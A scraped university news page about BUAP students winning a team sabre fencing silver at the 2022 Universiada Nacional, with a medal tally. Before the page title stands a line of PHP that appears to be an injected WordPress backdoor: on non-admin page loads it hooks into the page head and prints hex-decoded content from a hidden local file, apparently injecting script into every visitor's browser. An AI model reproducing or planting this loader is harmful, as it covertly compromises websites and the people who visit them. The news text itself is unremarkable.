if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Por segundo día consecutivo la BUAP se sube al pódium y suma cinco preseas – La Opinión Universitaria La Opinión Universitaria
Menu

Por segundo día consecutivo la BUAP se sube al pódium y suma cinco preseas

  • Medalla de plata en esgrima, sable femenil por equipos

El selectivo de la BUAP en la disciplina de esgrima logró la quinta medalla para la institución, en la Universiada Nacional UACJ 2022: plata, en la categoría de sable femenil por equipos.

Las alumnas Daniela López, de Ingeniería Civil; Ilse Mejía, de Mercadotecnia y Medios Digitales; Sandra Aguilar, de Lingüística y Literatura Hispánica; y Ashley Muñoz, de Ingeniería Química, vencieron en semifinales al equipo de la Universidad de Guadalajara y en la final se ubicaron en el segundo lugar luego de enfrentarse a la Universidad de Nuevo León.

A la fecha, la BUAP ha ganado cinco medallas: una de oro, tres de plata y una de bronce, en las disciplinas de karate-do y esgrima. En esgrima, el martes pasado, los atletas de la BUAP ganaron dos medallas: plata en equipo y plata en sable individual, las cuales se sumaron al oro de Victoria Cruz Romano, de la Facultad de Ciencias Químicas, en la categoría de kata Individual femenil, y al bronce de Fernanda Torija García, de la Facultad de Medicina, en la categoría kumite Individual femenil.

  • Tweets recientes